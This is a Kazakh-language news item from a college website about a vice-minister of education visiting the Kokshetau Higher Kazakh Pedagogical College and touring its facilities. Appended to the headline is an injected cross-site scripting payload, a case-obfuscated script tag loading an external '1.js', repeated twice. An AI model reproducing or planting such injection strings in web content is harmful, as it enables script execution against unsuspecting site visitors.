Қазақстан Республикасының Білім және ғылым вице-министрі Каринова Шолпан Таңатқызы Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің материалдық-техникалық базасымен танысты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.04.2021

Қазақстан Республикасының Білім және ғылым вице-министрі Каринова Шолпан Таңатқызы Көкшетау қаласының Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде болып, колледж ұжымымен кездесіп, материалдық-техникалық базасымен танысып шықты. Колледж директоры Ахат Нұртас Ахатұлы оқу ордасының базасымен арнайы таныстырып өтті. Кездесу барысында ақылды аудиториялардың дидактикалық қамтылымы, заманауи инновациялық-сандық технологиялар жүйесі, оқытушылардың электронды оқу-әдістемелік кешендері, студентке орталықтандырылған интеллектуалдық даму бағытындағы тәрбие кешені, клубтық-үйірмелік жұмыстарының түрлері көрсетілді және мектепке дейінгі білім құрылымындағы теория мен практика сабақтастығын жүзеге асыру мақсатында колледжде биылғы оқу жылында ашылған «Кәсіптік құзіреттілік алаңының» жұмыс мазмұны таныстырылды.

Просмотров: 538


Пікір қосу



Деректерді қолтаңбаға қосу